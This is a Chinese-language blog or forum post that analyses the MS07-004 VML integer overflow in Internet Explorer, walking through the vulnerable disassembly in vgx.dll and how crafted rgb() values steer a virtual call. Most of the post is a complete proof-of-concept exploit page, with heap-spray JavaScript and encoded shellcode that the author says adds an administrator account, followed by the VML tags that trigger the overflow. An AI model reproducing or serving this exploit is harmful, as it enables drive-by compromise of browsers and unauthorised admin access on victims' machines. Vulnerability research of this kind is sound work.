2. 技术人生
    3. MS07-004分析

    MS07-004分析

    技术2022-05-11  84

    by  幻影团长

     万众瞩目的MS07-004终于POC出炉了,之前小弟一直因为eeye的补丁比较工具bindiff在罢工,再加上一些琐事缠身,所以也没好好看这个漏洞。今天在eong兄和milw0rm上那位公布poc的老兄的基础上,好好跟了下这个漏洞。以下所有调试过程都是在简体中文版的XP SP2 Pro上进行的。首先,看写别人比较出来的因为他是在韩文系统上比较出来的,所以在中文版地址上有些不同,其实关系不大,只需要用OD搜 imul eax, eax, 2ch就可以定位到问题了。在我的系统上是:Codz:

    6FF176A5    5F              POP EDI 6FF176A6    5B              POP EBX 6FF176A7    8B46 08         MOV EAX,DWORD PTR DS:[ESI+8] 6FF176AA    0346 04         ADD EAX,DWORD PTR DS:[ESI+4] 6FF176AD    85C0            TEST EAX,EAX 6FF176AF    7E 13           JLE SHORT vgx.6FF176C4 6FF176B1    6BC0 2C         IMUL EAX,EAX,2C                     ;相乘,整数溢出 6FF176B4    68 01010000     PUSH 101 6FF176B9    50              PUSH EAX 6FF176BA    E8 3588FBFF     CALL vgx.6FECFEF4             ; malloc() 6FF176BF    59              POP ECX 6FF176C0    59              POP ECX 6FF176C1    8946 14         MOV DWORD PTR DS:[ESI+14],EAX 6FF176C4    B0 01           MOV AL,1 6FF176C6    5E              POP ESI 6FF176C7    5D              POP EBP 6FF176C8    C2 0C00         RETN 0C 这里是因为没有针对eax做检查,导致了整数溢出 相乘后,反而使malloc(eax*2ch)的空间变小了 在后来有一个movs的操作,会把内存一片片的拷到刚才malloc出来的地方。 在这个过程中,会覆盖掉 mshtml.dll中的一个虚函数保存在堆里的指针。 Codz: call   [ecx + 10h] 而这里的ecx正好是我们可以控制的。 在这里不得不提以下,漏洞触发的两个关键地方: 第一个: Codz: <v:recolorinfo recolorstate="t" numcolors="1" numfills="1073741831"> 这里后面的大整数可以是numcolors, 也可以放在numfills ,我这里放在了numfills里,其实都差不多。 Codz: 6FF176A7    8B46 08         MOV EAX,DWORD PTR DS:[ESI+8] 6FF176AA    0346 04         ADD EAX,DWORD PTR DS:[ESI+4] 因为这两句会把这个大整数传递给EAX,在后面给eax*2ch 用 第二个关键的地方是: Codz: <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="13" bitmaptype="13" /> 参数或许还有可以精简的地方,我没细改了。 在这里, rgb(a,b,c) 这里的a, b , c 可以直接传递到内存里面去,也会直接传递给后面的ecx 从而我们可以控制 call [ecx + 10h] 在这里,因为rgb只有3个参数,所以,地址的第一个字节只能是0x00 我在这里选择了rgb(90,22,64) 实际上就是 : 0x0040165A 这个地址是在iexplorer.exe里的 注意:不同系统和不同语言的这个地址可能会不同 至于如何通用这里就不提到了,因为这里也跟eong兄讨论过的,不方便发出来。 这个地址加10h 就是 0x0040166A 他指向了 0x0c15xxxx 而这个地址是正好落在我们的heap spray中间的,所以就跳转到了我们的shellcode。 下面是我们的POC, 如果一切正常,会在你的系统你添加一个帐户名为axis的管理员帐户。 另外这个漏洞比上次的ms06-055要好,可以恢复栈平衡,达到不挂ie的效果 Codz: <!-- MS07-004 VML integer overflow exploit   by axis@ph4nt0m.org --> <html xmlns:v="urn:schemas-microsoft-com:vml"> <head> <object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"> </object> <style> v:* { behavior: url(#VMLRender); } </style> </head> <body> <SCRIPT language="javascript"> shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u3749%u4949%u4949"+ "%u4949%u5a51%u636a%u3058%u3041%u4150%u416b%u7341%u4142%u4132%u3241%u4142%u4230%u5841"+ "%u4138%u5042%u4d75%u3939%u396c%u4178%u4754%u7770%u4370%u6c30%u674b%u7735%u4c4c%u334b"+ "%u754c%u3155%u5768%u6a71%u4e4f%u426b%u626f%u6c38%u434b%u756f%u5670%u4861%u316b%u6e59"+ "%u306b%u6c34%u534b%u3831%u576e%u4b41%u4e70%u6c79%u6d6c%u5954%u6150%u3464%u4f47%u4b31"+ "%u647a%u454d%u4951%u6a52%u7a4b%u4554%u326b%u7674%u3344%u7234%u7a55%u6c45%u614b%u774f"+ "%u4554%u4851%u426b%u4c46%u764b%u706c%u6e4b%u416b%u554f%u744c%u6a41%u4e4b%u556b%u4e4c"+ "%u356b%u7a51%u4f4b%u3179%u344c%u6564%u4b54%u3573%u6f61%u5030%u4e64%u376b%u5430%u6b70"+ "%u6f35%u4130%u3468%u6c4c%u774b%u3430%u4c4c%u504b%u3770%u4c6c%u6e6d%u506b%u6468%u3848"+ "%u456b%u4e59%u4d6b%u6e50%u6750%u5570%u4550%u6c50%u504b%u3768%u614c%u764f%u6b51%u3546"+ "%u7130%u6f46%u4c79%u6d38%u3953%u4150%u706b%u3050%u6168%u4e6e%u6b38%u7052%u3273%u4d48"+ "%u5948%u6d6e%u565a%u766e%u4b37%u4a4f%u5247%u7243%u314d%u7474%u356e%u7035%u7578%u3735"+ "%u4650%u724f%u3543%u7070%u706e%u3065%u7174%u4330%u5245%u4253%u3045%u3772%u7050%u6461"+ "%u7038%u6269%u3553%u4170%u5177%u3075%u726e%u4149%u3365%u7743%u4650%u334f%u4371%u7374"+ "%u4174%u4530%u5176%u5736%u3250%u334e%u4155%u4764%u6250%u724c%u334f%u5353%u3051%u526c"+ "%u3347%u7042%u336f%u7245%u3150%u4330%u4371%u5054%u336d%u7259%u714e%u3079%u4173%u7164"+ "%u4262%u3241%u7054%u616f%u5062%u6773%u3150%u6471%u3038%u7269%u3553%u7670%u324f%u3161"+ "%u3254%u4564%u6350"); bigblock = unescape("%u0c0c%u0c0c"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<350;i++) memory[i] = block + shellcode; </script> <v:rect style='width:120pt;height:80pt' fillcolor="red" > <v:recolorinfo recolorstate="t" numcolors="1" numfills="1073741831"> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="13" bitmaptype="13" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v:recolorinfoentry tocolor="rgb(90,22,64)"   lbcolor="rgb(90,22,64)" forecolor="rgb(90,22,64)" backcolor="rgb(90,22,64)" fromcolor="rgb(90,22,64)" lbstyle ="218959117" bitmaptype="218959117" /> <v/recolorinfo> </html> (注意论坛可能会把代码里的"/"过滤掉) BTW: 幻影exploit研究院出品,必属精品! 另外给小弟的blog打下广告,因为好象实在是太冷清了: http://blog.donews.com/axis 这个blog有跨站,我也没放任何重要的东西在里面,所以请大家就不要破坏了 我这个exp版本是有缺陷的,所以想直接拿来用的朋友们要失望了,本贴以技术研究为主,谢谢!

    专利

    最新回复(0)